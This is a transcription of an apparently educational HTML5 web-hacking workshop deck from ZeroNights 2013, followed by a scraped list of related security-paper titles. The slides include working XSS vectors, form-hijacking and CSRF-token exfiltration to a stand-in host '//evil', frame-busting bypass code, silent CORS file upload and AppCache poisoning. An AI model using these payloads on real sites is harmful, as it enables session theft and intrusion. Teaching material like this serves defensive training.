Hacking HTML5. No VirtualBox? VirtualBox (~4 gb needed) Apache + PHP Chrome + Firefox. unpack zeronights.zip
|
|
|
- Susan Hoover
- 10 years ago
- Views:
Transcription
1 VirtualBox (~4 gb needed) No VirtualBox? Apache + PHP Chrome + Firefox unpack zeronights.zip host root dir as //localvictim and // shared folder - dir with upacked zeronights.zip login:ubuntu, pass:? /evil dir as //evil Hacking HTML5 Krzysztof Kotowicz ZeroNights 2013
2 /whoami I work at SecuRing and Cure53 I do web security research I present at cons (BlackHat, BRUCon, Hack In Paris, OWASP AppSec, blog.kotowicz.net Plan hacks = [ "Same Origin Policy quirks, flavors & bypasses", "XSSing with HTML5 twisted vectors & amazing exploits", "Exploiting Web Messaging", "Attacking with Cross Origin Resource Sharing", "Targeting Client side storage and Offline Cache Poisoning", "Using WebSockets for attacks", "Iframe sandboxing & clickjacking", "Bypassing Content Security Policy", "Webkit XSS Auditor & IE Anti-XSS filter behind the scenes", ]
3 Plan def plan():! general_intro()! known = [js, xss, http,..]! for h in hacks:!!known.append(h)!!intro(h, short=true)!!attack_with(known) Disclaimer Workshops highly practical Firebug & similar tools knowledge assumed Medium-to-hard tasks Limited time - try at home! Ask questions please! Of course - use all this for educational purposes & doing legitimate stuff
4 Lab setup ubuntu:ubuntu /home/ubuntu/desktop/remote/ evil/solutions Same Origin Policy quirks, flavors & bypasses
5 Same Origin Policy Security model for the web Restrict communication between applications from different origins Origin = scheme + host + port Same Origin Policy Multiple same origin policies - cookies, DOM access, Flash, Java, XMLHttpRequest Different rules for policies Multiple quirks
6 SOP Bypass vs XSS SOP bypass = read / write across origins e.g. read DOM elements set cookies browser / specs bug XSS - execute code on target origin application bug SOP Quirks Java applets example.com === example.net $ host example.com example.com has address $ host example.net example.net has address Shared hosting => SOP bypass
7 SOP Quirks IE - port does not matter == cookies: Any subdomain can set cookies to parent domains microsoft.com must trust all *.microsoft.com sites SOP Quirks cookie forcing - write arbitrary cookies HTTPS Set-Cookie: admin=false; secure HTTP (man-in-the-middle) Set-Cookie: admin=true; secure Cookie: admin=true;
8 SOP side-channels window.name <iframe name="yup.anything!you()want"> window.open('a_name') setting location traversing iframes top.frames[1].frames[2].length top.frames[1].frames[2].location= iframe height, scrolling positions timing SVG filters - Browser_Timing_Attacks.pdf Practice! alert secret value detect if user is logged in or not (x-domain) * alert secret value
9 XSSing with HTML5 twisted vectors & amazing exploits XSS in HTML5 <input button autofocus> <math> <maction actiontype="statusline" xlink:href="javascript:alert(3)">clickme <mtext> </maction> </math> <input oninput=alert(1) autofocus> <div style="height:30px;overflow:scroll" onscroll=alert(1)>...</div>
10 XSS in HTML5 Interesting form based vectors: <form id="f">... <button form=f formaction=//evil.me formtarget=...> <button form=f type=submit> Send form to your server Change target window Change encoding XSS in HTML5 <form id=f action= <input name=secret> </form> // anywhere in the document - notice no JS! <button form=f formaction= </button>
11 Data: URIs Evade filters XSS in HTML5 data:[<mime-type>][;charset=<charset>][;base64],<data> <a href= data:text/html, <script>alert(1)</script> >XSS</a> <a href= data:text/html;base64, PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg== > btoa() XSS in HTML5 HTML5 helps with the exploitation WebSockets connection with C&C Extract local DB, geolocation, HTML5 filesystem // stealth mode history.pushstate('/innocent-url') // persistence localstorage['code']='alert(/delayed/)'; // months later eval(localstorage['code'])
12 Practice! alert one * send csrf token to //evil Exploiting Web Messaging
13 Web Messaging Web browsers, for security and privacy reasons, prevent documents in different domains from affecting each other; that is, cross-site scripting is disallowed. While this is an important security feature, it prevents pages from different domains from communicating even when those pages are not hostile. This section introduces a messaging system that allows documents to communicate with each other regardless of their source domain, in a way designed to not enable cross-site scripting attacks. Web Messaging...designed not to enable XSS postmessage2
14 Web Messaging client-side window-to-window communication no server, no TCP traffic! cross domain by default Web Messaging <html> // my.domain <iframe src=//other.domain/widget></iframe> // sender var w = frameelement.contentwindow; var worigin = ' // or "*" w.postmessage('hi!', worigin); // receiver window.addeventlistener("message", function(e) { if (e.origin!== " { alert('ignoring ' + e.origin); } else { alert(e.origin + " said: " + e.data); } }, false);
15 Web Messaging bugs // frame could get replaced, you're sending to attacker!!! frame.postmessage({secret:stuff}, "*"); window.addeventlistener("message", function(e) {! // no sender validation! do_stuff_with(e.data);! // are you kidding me??! div.innerhtml = e.data; } Practice! XSS the victim * hijack the contents of an when user enters it
16 Attacking with Cross Origin Resource Sharing CORS Cross domain XHR, with credentials: cookies SSL/TLS client certificate HTTP auth credentials Target server decides to allow/forbid
17 In domain only Classic XHR CORS Cross-domain allowed
18 CORS XHR request reaches the target server With appropriate credentials Can be abused for Cross Site Request Forgery CORS // var xhr = new XMLHttpRequest(); xhr.open("post", " xhr.setrequestheader("content-type", "text/ plain"); xhr.withcredentials = "true"; // cookies etc. xhr.send("anything");
19 CORS on the wire Simple request GET /data/ HTTP/1.1 Host: target.example Origin: HTTP/ OK Date: Mon, 01 Dec :23:53 GMT Server: Apache/ Access-Control-Allow-Origin: Content-Type: application/json {"secret-data":xxxxxx} CORS on the wire preflight OPTIONS /data/ HTTP/1.1 Host: target.example Origin: Access-Control-Request-Method: POST Access-Control-Request-Headers: X-MyHeader HTTP/ OK Access-Control-Allow-Origin: Access-Control-Allow-Methods: POST, GET, OPTIONS Access-Control-Allow-Headers: X-MyHeader Access-Control-Max-Age:
20 CORS on the wire preflight POST /data/ HTTP/1.1 Host: target.example Origin: Content-Type: text/xml; charset=utf-8 Content-Length: xxx X-MyHeader: apikey= <?xml... HTTP/ OK Access-Control-Allow-Origin: Content-Type: text/plain ok CORS - weaknesses Again, wildcards: Access-Control-Allow-Origin: * = everybody can read me A-C-A-O: <sender-origin> is even worse You can use CORS to send arbitrary blind requests (CSRF) What if receiver is malicious?
21 Silent file upload Content-Type: multipart/form-data; boundary=aab03x --AaB03x Content-Disposition: form-data; name="submit-name" Larry --AaB03x Content-Disposition: form-data; name="files"; filename="file1.txt" Content-Type: text/plain... contents of file1.txt... --AaB03x-- xhr.send("anything"); Silent file upload xhr.setrequestheader("content-type", "multipart/form-data, boundary=xxx"); xhr.send('\ --xxx\r\n\ Content-Disposition: form-data;\ name="files"; filename="file1.txt"\r\n\ Content-Type: text/plain\r\n\ \r\n\ ANYTHING\r\n\ --xxx--');
22 Silent file upload Simulates multipart/form-data request with <input type=file> upload Already used to: Replace firmware in routers Take control of application servers logurl = ' management/domain/applications/ application'; fileupload(c,"maliciousarchive.war"); Content injection xhr.open("get", "/a/page"); example.com/xss.php HTTP/ OK Access-Control-Allow-Origin: * Content-Type: text/html <img src=x onerror=alert(1)>
23 Practice! XSS the victim and alert his user ID Targeting Client side storage & Offline Cache Poisoning
24 AppCache HTML pages can specify a manifest URL <html manifest=/cache.manifest> Manifest text/cache-manifest MIME type Lists URLs that should be fetched and stored Man in the middle Eavesdrop / modify traffic XSS session hijack (Firesheep) Doesn t last long
25 AppCache poison 1. During MITM: inject poison <html manifest="/robots.txt">...<script>evil_foo()</script> 2. After MITM: robots.txt has invalid MIME type poisoned page fetched from cache code runs until offline cache is purged CACHE MANIFEST CACHE: NETWORK: * Demo! perform offline attack with sslstrip google-chrome --proxy-server= payload: alert login & password
26 Using WebSockets for attacks WebSockets 2-way TCP connection from browser to server bandwidth efficient asynchronous - no request / response model available to JS
27 WebSockets Handshake similar to HTTP Optionally encrypted with TLS (wss://) Dumb protocol No user authorization No user authentication WebSockets if (window.websocket) { var url = 'ws://host:port/path',s = new WebSocket(url); s.onopen = function(e) {}; s.onclose = function(e) {}; s.onmessage = function(e) { // e.data - server sent data }; } s.send('hello server!');
28 WebSockets security Attack app-level protocols look for DoS, auth flaws Sometimes plain TCP services are tunneled over WebSockets You can attack servers with: browser - xss browser - third party website custom client Demo! cd /home/ubuntu/desktop/remote/06- websockets/websockify-master./run.sh login into ws://localvictim:9999 user admin * extract flag from admin home dir
29 Iframe sandboxing & clickjacking Clickjacking You all know it. Don t get framed Lots of websites use: if (self!== top) {! top.location = self.location; }
30 Clickjacking - bypass // evil framing victim wanting to jump out of frame var kill_bust = 0 window.onbeforeunload = function(){kill_bust++}; setinterval(function() { if (kill_bust > 0) { kill_bust -= 2; top.location = '204.php'; }}, 1); // basically, a race condition on top reload Clickjacking w/ HTML5 IFRAME sandbox restricts what a frame can do <iframe src=" sandbox=" allow-forms allow-scripts" /> no allow-top-navigation => top.location.href =... fails
31 Practice! clickjack Delete my account button Bypassing Content Security Policy
32 CSP whitelist content on your website with HTTP headers e.g. Mitigate XSS by forbidding inline scripting Only allow images from your CDN Only allow XHR to your API server CSP Content-Security-Policy: default-src: 'none'; style-src: script-src: 'self' img-src: 'self' report-uri:
33 CSP It s XSS mitigation, XSS is still possible via obscure vectors <iframe src= filesystem://...> Chrome Extensions JSONP CSP You can do much even without XSS content extraction - unclosed elements: <img src=...<something>... <else> other - CSP-kuza55.pptx
34 CSP Still fresh concept & rapid development Fresh scary bugs id= Practice! send CSRF token to //evil * XSS (Firefox). If in Chrome, contact me ;)
35 Browser XSS filters behind the scenes Browser XSS filters Detect dangerous patterns in HTTP request parameters (GET/POST) Observe for reflection in HTTP response Neutralize injection or block entire page X-Xss-Protection: 0 1
36 Browser XSS filters Browser XSS filters IE8 <[i]?f{r}ame.*?[ /+\t]*?src[ /+\t]* (j (&[#()=]x?0*((74) (4A) (106) (6A));?))([\t] (&[#()=]x?0*(9 (13) (10) A D);?))*(a (&[#()=]x?0*((65) (41) (97) (61));?))([\t] (&[#()=]x?0*(9 (13) ( 10) A D);?))*(v (&[#()=]x?0*((86) (56) (118) (76));?))([\t] (&[#()=]x?0*(9 (13) (10) A D);?))*(a (&[#()=]x?0*((65) (41) (97) (61));?))([\t] (&[#()=] x?0*(9 (13) (10) A D);?))*(s (&[#()=]x?0*((83) (53) (115) (73));?))([\t] ( &[#()=]x?0*(9 (13) (10) A D);?))*(c (&[#()=]x?0*((67) (43) (99) (63));?))( [\t] (&[#()=]x?0*(9 (13) (10) A D);?))*{(r (&[#()=]x?0*((82) (52) (114) (7 2));?))}([\t] (&[#()=]x?0*(9 (13) (10) A D);?))*(i (&[#()=]x?0*((73) (49) (105) (69));?))([\t] (&[#()=]x?0*(9 (13) (10) A D);?))*(p (&[#()=]x?0*((80 ) (50) (112) (70));?))([\t] (&[#()=]x?0*(9 (13) (10) A D);?))*(t (&[#()=]x?0*((84) (54) (116) (74));?))([\t] (&[#()=]x?0*(9 (13) (10) A D);?))*(: (& [#()=]x?0*((58) (3A));?)).
37 Browser XSS filters Chrome complex rules, discovers different contexts, tries to decode etc. Source/core/html/parser/XSSAuditor.cpp? revision=head&view=markup Bypasses every other month Browser XSS filters tricks Use to disable benign scripts (e.g. framebusters) Only GET / POST matched => use cookies Multiple param injections = you always win
38 Browser XSS filters ASP.NET tricks /06/browsers-anti-xss-methods-in-aspclassic-have-been-defeated/ concatenation: input1=a&input1=b => a,b truncation:anything after %00 ignored transliteration: %u0117 => ė => e Practice! * * XSS em all (Chrome)!
39 That is all. thx. q&a? Liked that? //blog.kotowicz.net
Relax Everybody: HTML5 Is Securer Than You Think
Relax Everybody: HTML5 Is Securer Than You Think Martin Johns (@datenkeller) SAP AG Session ID: ADS-W08 Session Classification: Advanced Motivation For some reason, there is a preconception that HTML5
Next Generation Clickjacking
Next Generation Clickjacking New attacks against framed web pages Black Hat Europe, 14 th April 2010 Paul Stone [email protected] Coming Up Quick Introduction to Clickjacking Four New Cross-Browser
Security starts in the head(er)
Security starts in the head(er) JavaOne 2014 Dominik Schadow bridgingit Policies are independent of framework and language response.addheader(! "Policy name",! "Policy value"! ); User agent must understand
Investigation Report Regarding Security Issues of Web Applications Using HTML5
Investigation Report Regarding Security Issues of Web Applications Using HTML5 JPCERT Coordination Center October 30, 2013 Contents 1. Introduction... 2 2. Purpose and Method of This Investigation... 4
A Tale of the Weaknesses of Current Client-Side XSS Filtering
Call To Arms: A Tale of the Weaknesses of Current Client-Side XSS Filtering Martin Johns, Ben Stock, Sebastian Lekies About us Martin Johns, Ben Stock, Sebastian Lekies Security Researchers at SAP, Uni
HTML5 Top 10 Threats - Stealth Attacks and Silent Exploits
HTML5 Top 10 Threats - Stealth Attacks and Silent Exploits By Shreeraj Shah, Founder & Director, Blueinfy Solutions Abstract HTML5 is an emerging stack for next generation applications. HTML5 is enhancing
A Server and Browser-Transparent CSRF Defense for Web 2.0 Applications. Slides by Connor Schnaith
A Server and Browser-Transparent CSRF Defense for Web 2.0 Applications Slides by Connor Schnaith Cross-Site Request Forgery One-click attack, session riding Recorded since 2001 Fourth out of top 25 most
OWASP. The OWASP Foundation http://www.owasp.org. HTML5: Something wicked this way comes. Krzysztof Kotowicz Securing krzysztof.kotowicz@securing.
HTML5: Something wicked this way comes Krzysztof Kotowicz Securing [email protected] Copyright 2007 The Foundation Permission is granted to copy, distribute and/or modify this document under
A Tale of the Weaknesses of Current Client-side XSS Filtering
A Tale of the Weaknesses of Current Client-side XSS Filtering Sebastian Lekies (@sebastianlekies), Ben Stock (@kcotsneb) and Martin Johns (@datenkeller) Attention hackers! These slides are preliminary!
Abusing HTML5. DEF CON 19 Ming Chow Lecturer, Department of Computer Science TuCs University Medford, MA 02155 [email protected]
Abusing HTML5 DEF CON 19 Ming Chow Lecturer, Department of Computer Science TuCs University Medford, MA 02155 [email protected] What is HTML5? The next major revision of HTML. To replace XHTML? Yes Close
Recent Advances in Web Application Security
Recent Advances in Web Application Security Author: Neelay S Shah Principal Security Consultant Foundstone Professional Services Table of Contents Introduction 3 Content Security Policy 3 Best Practices
Hack Yourself First. Troy Hunt @troyhunt troyhunt.com [email protected]
Hack Yourself First Troy Hunt @troyhunt troyhunt.com [email protected] We re gonna turn you into lean, mean hacking machines! Because if we don t, these kids are going to hack you Jake Davies, 19 (and
1. Introduction. 2. Web Application. 3. Components. 4. Common Vulnerabilities. 5. Improving security in Web applications
1. Introduction 2. Web Application 3. Components 4. Common Vulnerabilities 5. Improving security in Web applications 2 What does World Wide Web security mean? Webmasters=> confidence that their site won
SAMSUNG SMARTTV: HOW-TO TO CREATING INSECURE DEVICE IN TODAY S WORLD. Sergey Belov
Sergey Belov # whoami Penetration tester @ Digital Security Bug hunter Speaker Agenda SmartTV - what is it? Current state of research (in the world) Samsung Smart TV - series 2008-2014 Emulator vs real
HTML5. Eoin Keary CTO BCC Risk Advisory. www.bccriskadvisory.com www.edgescan.com
HTML5 Eoin Keary CTO BCC Risk Advisory www.bccriskadvisory.com www.edgescan.com Where are we going? WebSockets HTML5 AngularJS HTML5 Sinks WebSockets: Full duplex communications between client or server
Web Application Security
Web Application Security The OWASP Foundation Securing the application Input validation Authorization Session mgmt Config mgmt Authenticatio n Error handling Web server App server DB server Secure storage
XSS PROTECTION CHEATSHEET FOR DEVELOPERS V1.0. Author of OWASP Xenotix XSS Exploit Framework opensecurity.in
THE ULTIMATE XSS PROTECTION CHEATSHEET FOR DEVELOPERS V1.0 Ajin Abraham Author of OWASP Xenotix XSS Exploit Framework opensecurity.in The quick guide for developers to protect their web applications from
AppSec USA 2014 Denver, Colorado Security Header Injection Module (SHIM)
AppSec USA 2014 Denver, Colorado Security Header Injection Module (SHIM) Inspired By: The OWASP Secure Headers Project Introduction Eric Johnson (@emjohn20) Cypress Data Defense Security Consultant SANS
Cyber Security Workshop Ethical Web Hacking
Cyber Security Workshop Ethical Web Hacking May 2015 Setting up WebGoat and Burp Suite Hacking Challenges in WebGoat Concepts in Web Technologies and Ethical Hacking 1 P a g e Downloading WebGoat and Burp
Project 2: Web Security Pitfalls
EECS 388 September 19, 2014 Intro to Computer Security Project 2: Web Security Pitfalls Project 2: Web Security Pitfalls This project is due on Thursday, October 9 at 6 p.m. and counts for 8% of your course
Intrusion detection for web applications
Intrusion detection for web applications Intrusion detection for web applications Łukasz Pilorz Application Security Team, Allegro.pl Reasons for using IDS solutions known weaknesses and vulnerabilities
Web applications. Web security: web basics. HTTP requests. URLs. GET request. Myrto Arapinis School of Informatics University of Edinburgh
Web applications Web security: web basics Myrto Arapinis School of Informatics University of Edinburgh HTTP March 19, 2015 Client Server Database (HTML, JavaScript) (PHP) (SQL) 1 / 24 2 / 24 URLs HTTP
Protecting Web Applications and Users
Protecting Web Applications and Users Technical guidance for improving web application security through implementing web browser based mitigations. Defence Signals Directorate February 2012 Contents 1
Web App Security Keeping your application safe Joe Walker
Web App Security Keeping your application safe Joe Walker CSRF = Cross Site Request Forgery You are at risk of a CSRF attack whenever you assume that a request containing an authentication header (e.g.
Bug Report. Date: March 19, 2011 Reporter: Chris Jarabek ([email protected])
Bug Report Date: March 19, 2011 Reporter: Chris Jarabek ([email protected]) Software: Kimai Version: 0.9.1.1205 Website: http://www.kimai.org Description: Kimai is a web based time-tracking application.
Preparing for the Cross Site Request Forgery Defense
Preparing for the Cross Site Request Forgery Defense Chuck Willis [email protected] Black Hat DC 2008 February 20, 2008 About Me Principal Consultant with MANDIANT in Alexandria, VA Full spectrum
OWASP Application Security Building and Breaking Applications
OWASP Application Security Building and Breaking Applications Rochester OWASP Chapter - Durkee Consulting, Inc. [email protected] Who's? Principal Security Consultant Durkee Consulting Inc. Founder of Rochester
SESSION IDENTIFIER ARE FOR NOW, PASSWORDS ARE FOREVER
SESSION IDENTIFIER ARE FOR NOW, PASSWORDS ARE FOREVER XSS-BASED ABUSE OF BROWSER PASSWORD MANAGERS Ben Stock, Martin Johns, Sebastian Lekies Browser choices Full disclosure: Ben was an intern with Microsoft
Detecting and Exploiting XSS with Xenotix XSS Exploit Framework
Detecting and Exploiting XSS with Xenotix XSS Exploit Framework [email protected] keralacyberforce.in Introduction Cross Site Scripting or XSS vulnerabilities have been reported and exploited since 1990s.
Real World Java Web Security
Real World Java Web Security Java User Group Karlsruhe Dominik Schadow bridgingit Who thinks about architecture while coding? architecture before coding? Who thinks about security while coding? security
Hack Proof Your Webapps
Hack Proof Your Webapps About ERM About the speaker Web Application Security Expert Enterprise Risk Management, Inc. Background Web Development and System Administration Florida International University
Criteria for web application security check. Version 2015.1
Criteria for web application security check Version 2015.1 i Content Introduction... iii ISC- P- 001 ISC- P- 001.1 ISC- P- 001.2 ISC- P- 001.3 ISC- P- 001.4 ISC- P- 001.5 ISC- P- 001.6 ISC- P- 001.7 ISC-
How to break in. Tecniche avanzate di pen testing in ambito Web Application, Internal Network and Social Engineering
How to break in Tecniche avanzate di pen testing in ambito Web Application, Internal Network and Social Engineering Time Agenda Agenda Item 9:30 10:00 Introduction 10:00 10:45 Web Application Penetration
Web application security
Web application security Sebastian Lopienski CERN Computer Security Team openlab and summer lectures 2010 (non-web question) Is this OK? int set_non_root_uid(int uid) { // making sure that uid is not 0
Advanced XSS. Nicolas Golubovic
Advanced XSS Nicolas Golubovic Image courtesy of chanpipat / FreeDigitalPhotos.net Today's menu 1. Starter: reboiled XSS 2. Course: spicy blacklists & filters 3. Course: sweet content sniffing 4. Course:
Pwning Intranets with HTML5
Javier Marcos de Prado Juan Galiana Lara Pwning Intranets with HTML5 2009 IBM Corporation Agenda How our attack works? How we discover what is in your network? What does your infrastructure tell us for
Enterprise Application Security Workshop Series
Enterprise Application Security Workshop Series Phone 877-697-2434 fax 877-697-2434 www.thesagegrp.com Defending JAVA Applications (3 Days) In The Sage Group s Defending JAVA Applications workshop, participants
Web Application Hacking (Penetration Testing) 5-day Hands-On Course
Web Application Hacking (Penetration Testing) 5-day Hands-On Course Web Application Hacking (Penetration Testing) 5-day Hands-On Course Course Description Our web sites are under attack on a daily basis
What about MongoDB? can req.body.input 0; var date = new Date(); do {curdate = new Date();} while(curdate-date<10000)
Security What about MongoDB? Even though MongoDB doesn t use SQL, it can be vulnerable to injection attacks db.collection.find( {active: true, $where: function() { return obj.credits - obj.debits < req.body.input;
(WAPT) Web Application Penetration Testing
(WAPT) Web Application Penetration Testing Module 0: Introduction 1. Introduction to the course. 2. How to get most out of the course 3. Resources you will need for the course 4. What is WAPT? Module 1:
ASP.NET MVC Secure Coding 4-Day hands on Course. Course Syllabus
ASP.NET MVC Secure Coding 4-Day hands on Course Course Syllabus Course description ASP.NET MVC Secure Coding 4-Day hands on Course Secure programming is the best defense against hackers. This multilayered
Web Application Security
Web Application Security John Zaharopoulos ITS - Security 10/9/2012 1 Web App Security Trends Web 2.0 Dynamic Webpages Growth of Ajax / Client side Javascript Hardening of OSes Secure by default Auto-patching
Table of Contents. Page ii
Table of Contents Abstract... 1 1. Introduction... 2 1.1 Form Validation in HTML 4... 2 1.2 Form Validation in HTML5... 3 2. HTML5 Security Concerns... 4 2.1 Web Storage Attacks... 4 3.1 Session Storage...
Sichere Webanwendungen mit Java
Sichere Webanwendungen mit Java Karlsruher IT- Sicherheitsinitiative 16.07.2015 Dominik Schadow bridgingit Patch fast Unsafe platform unsafe web application Now lets have a look at the developers OWASP
X-Frame-Options: All about Clickjacking?
X-Frame-Options: All about Clickjacking? How else do X-Frame-Options protect my website A poem by Frederik Braun (Mozilla) and Mario Heiderich (Cure53) The X-Frame-Options header is known to be a good
APPLICATION SECURITY AND ITS IMPORTANCE
Table of Contents APPLICATION SECURITY AND ITS IMPORTANCE 1 ISSUES AND FIXES: 2 ISSUE: XSS VULNERABILITIES 2 ISSUE: CSRF VULNERABILITY 2 ISSUE: CROSS FRAME SCRIPTING (XSF)/CLICK JACKING 2 ISSUE: WEAK CACHE
Web Application Guidelines
Web Application Guidelines Web applications have become one of the most important topics in the security field. This is for several reasons: It can be simple for anyone to create working code without security
Security Model for the Client-Side Web Application Environments
Security Model for the Client-Side Web Application Environments May 24, 2007 Sachiko Yoshihama, Naohiko Uramoto, Satoshi Makino, Ai Ishida, Shinya Kawanaka, and Frederik De Keukelaere IBM Tokyo Research
The Top Web Application Attacks: Are you vulnerable?
QM07 The Top Web Application Attacks: Are you vulnerable? John Burroughs, CISSP Sr Security Architect, Watchfire Solutions [email protected] Agenda Current State of Web Application Security Understanding
Secure development and the SDLC. Presented By Jerry Hoff @jerryhoff
Secure development and the SDLC Presented By Jerry Hoff @jerryhoff Agenda Part 1: The Big Picture Part 2: Web Attacks Part 3: Secure Development Part 4: Organizational Defense Part 1: The Big Picture Non
Advanced Web Technology 10) XSS, CSRF and SQL Injection 2
Berner Fachhochschule, Technik und Informatik Advanced Web Technology 10) XSS, CSRF and SQL Injection Dr. E. Benoist Fall Semester 2010/2011 Table of Contents Cross Site Request Forgery - CSRF Presentation
Security Basics - Lessons From a Paranoid. Stuart Larsen Yahoo! Paranoids - Pentest
Security Basics Lessons From a Paranoid Stuart Larsen Yahoo! Paranoids Pentest Overview Threat Modeling Common Web Vulnerabilities Automated Tooling Modern Attacks whoami Threat Modeling Analyzing the
Chapter 1 Web Application (In)security 1
Introduction xxiii Chapter 1 Web Application (In)security 1 The Evolution of Web Applications 2 Common Web Application Functions 4 Benefits of Web Applications 5 Web Application Security 6 "This Site Is
Check list for web developers
Check list for web developers Requirement Yes No Remarks 1. Input Validation 1.1) Have you done input validation for all the user inputs using white listing and/or sanitization? 1.2) Does the input validation
The Web s Security Model. Who am I?
The Web s Security Model Philippe De Ryck [email protected] Who am I? Philippe De Ryck Final year PhD student at iminds-distrinet, KU Leuven Research on Cross-Site Request Forgery and Session
Hacking Web Apps. Detecting and Preventing Web Application Security Problems. Jorge Blanco Alcover. Mike Shema. Technical Editor SYNGRESS
Hacking Web Apps Detecting and Preventing Web Application Security Problems Mike Shema Technical Editor Jorge Blanco Alcover AMSTERDAM BOSTON HEIDELBERG LONDON NEW YORK OXFORD PARIS SAN DIEGO SAN FRANCISCO
Finding and Preventing Cross- Site Request Forgery. Tom Gallagher Security Test Lead, Microsoft
Finding and Preventing Cross- Site Request Forgery Tom Gallagher Security Test Lead, Microsoft Agenda Quick reminder of how HTML forms work How cross-site request forgery (CSRF) attack works Obstacles
Department of Computing Imperial College London. BrowserAudit. A web application that tests the security of browser implementations
Department of Computing Imperial College London BrowserAudit A web application that tests the security of browser implementations Charlie Hothersall-Thomas Supervisor: Dr. Sergio Maffeis June 2014 Submitted
Cross-Site Scripting
Cross-Site Scripting (XSS) Computer and Network Security Seminar Fabrice Bodmer ([email protected]) UNIFR - Winter Semester 2006-2007 XSS: Table of contents What is Cross-Site Scripting (XSS)? Some
Ethical Hacking as a Professional Penetration Testing Technique
Ethical Hacking as a Professional Penetration Testing Technique Rochester ISSA Chapter Rochester OWASP Chapter - Durkee Consulting, Inc. [email protected] 2 Background Founder of Durkee Consulting since 1996
Web Application Security Guidelines for Hosting Dynamic Websites on NIC Servers
Web Application Security Guidelines for Hosting Dynamic Websites on NIC Servers The Website can be developed under Windows or Linux Platform. Windows Development should be use: ASP, ASP.NET 1.1/ 2.0, and
Lecture 11 Web Application Security (part 1)
Lecture 11 Web Application Security (part 1) Computer and Network Security 4th of January 2016 Computer Science and Engineering Department CSE Dep, ACS, UPB Lecture 11, Web Application Security (part 1)
Thomas Röthlisberger IT Security Analyst [email protected]
Thomas Röthlisberger IT Security Analyst [email protected] Compass Security AG Werkstrasse 20 Postfach 2038 CH-8645 Jona Tel +41 55 214 41 60 Fax +41 55 214 41 61 [email protected] www.csnc.ch What
Essential IT Security Testing
Essential IT Security Testing Application Security Testing for System Testers By Andrew Muller Director of Ionize Who is this guy? IT Security consultant to the stars Member of OWASP Member of IT-012-04
EVALUATING COMMERCIAL WEB APPLICATION SECURITY. By Aaron Parke
EVALUATING COMMERCIAL WEB APPLICATION SECURITY By Aaron Parke Outline Project background What and why? Targeted sites Testing process Burp s findings Technical talk My findings and thoughts Questions Project
NoSQL, But Even Less Security Bryan Sullivan, Senior Security Researcher, Adobe Secure Software Engineering Team
NoSQL, But Even Less Security Bryan Sullivan, Senior Security Researcher, Adobe Secure Software Engineering Team Agenda Eventual Consistency REST APIs and CSRF NoSQL Injection SSJS Injection NoSQL databases
Secure Web Development Teaching Modules 1. Threat Assessment
Secure Web Development Teaching Modules 1 Threat Assessment Contents 1 Concepts... 1 1.1 Software Assurance Maturity Model... 1 1.2 Security practices for construction... 3 1.3 Web application security
Web Security Testing Cookbook*
Web Security Testing Cookbook* Systematic Techniques to Find Problems Fast Paco Hope and Ben Walther O'REILLY' Beijing Cambridge Farnham Koln Sebastopol Tokyo Table of Contents Foreword Preface xiii xv
Attacks on Clients: Dynamic Content & XSS
Software and Web Security 2 Attacks on Clients: Dynamic Content & XSS (Section 7.1.3 on JavaScript; 7.2.4 on Media content; 7.2.6 on XSS) sws2 1 Recap from last lecture Attacks on web server: attacker/client
Defending your Web Applications from Attack: Presenter: Damira Pon, UAlbany. NYS Forum Web & Accessibility Workgroup Talk. NYS Forum Training Room
Defending your Web Applications from Attack: Current Web-Based Threats, Resources & Tools Presenter: Damira Pon, UAlbany NYS Forum Talk NYS Forum Training Room 24 Aviation Rd. Albany, NY 9:00am 12:00pm
BASELINE SECURITY TEST PLAN FOR EDUCATIONAL WEB AND MOBILE APPLICATIONS
BASELINE SECURITY TEST PLAN FOR EDUCATIONAL WEB AND MOBILE APPLICATIONS Published by Tony Porterfield Feb 1, 2015. Overview The intent of this test plan is to evaluate a baseline set of data security practices
Web Application Security
Web Engineering Web Application Security Copyright 2013 Srdjan Komazec and Davide Cerri 1 Overview Motivation Technical Solution Basic Techniques Channel Security Web Application Authentication Methods
Attacking with HTML5. By,
By, Lavakumar Kuppan w ww.andlabs.org October 18, 2010 1 Introduction: HTML5 is redefining the ground rules for future Web Applications by providing a rich set of new features and by extending existing
Web Application Exploits
Monday, November 10, 2014 Resources: see final slide CS342 Computer Security Department of Computer Science Wellesley College Web Evolution o Static content: Server serves web pages created by people.
Where every interaction matters.
Where every interaction matters. Peer 1 Vigilant Web Application Firewall Powered by Alert Logic The Open Web Application Security Project (OWASP) Top Ten Web Security Risks and Countermeasures White Paper
DNS REBINDING DENIS BARANOV, POSITIVE TECHNOLOGIES
DNS REBINDING DENIS BARANOV, POSITIVE TECHNOLOGIES TABLE OF CONTENTS 1 Bypassing The Restrictions 3 2 Putting It into Practice 5 3 Actual Load 7 4 Detection Of The Application Version 5 Guessing A/The
ASL IT Security Advanced Web Exploitation Kung Fu V2.0
ASL IT Security Advanced Web Exploitation Kung Fu V2.0 A S L I T S e c u r i t y P v t L t d. Page 1 Overview: There is a lot more in modern day web exploitation than the good old alert( xss ) and union
CTIS 256 Web Technologies II. Week # 1 Serkan GENÇ
CTIS 256 Web Technologies II Week # 1 Serkan GENÇ Introduction Aim: to be able to develop web-based applications using PHP (programming language) and mysql(dbms). Internet is a huge network structure connecting
Secure Coding. External App Integrations. Tim Bach Product Security Engineer salesforce.com. Astha Singhal Product Security Engineer salesforce.
Secure Coding External App Integrations Astha Singhal Product Security Engineer salesforce.com Tim Bach Product Security Engineer salesforce.com Safe Harbor Safe harbor statement under the Private Securities
Certified Secure Web Application Security Test Checklist
www.certifiedsecure.com [email protected] Tel.: +31 (0)70 310 13 40 Loire 128-A 2491 AJ The Hague The Netherlands Certified Secure Checklist About Certified Secure exists to encourage and fulfill
RTC-Web Security Considerations
RTC-Web Security Considerations IETF 80 Eric Rescorla [email protected] IETF 80 RTC-Web Security Issues 1 The Browser Threat Model Core Web Security Guarantee: users can safely visit arbitrary web sites and
What is Web Security? Motivation
[email protected] http://www.brucker.ch/ Information Security ETH Zürich Zürich, Switzerland Information Security Fundamentals March 23, 2004 The End Users View The Server Providers View What is Web
HTTP Response Splitting
The Attack HTTP Response Splitting is a protocol manipulation attack, similar to Parameter Tampering The attack is valid only for applications that use HTTP to exchange data Works just as well with HTTPS
UI Redressing and Clickjacking. About click fraud and data theft
: About click fraud and data theft Marcus Niemietz [email protected] Ruhr-University Bochum Chair for Network and Data Security 25th of November 2011 Short and crisp details about me Studying IT-Security/Information
Acunetix Website Audit. 5 November, 2014. Developer Report. Generated by Acunetix WVS Reporter (v8.0 Build 20120808)
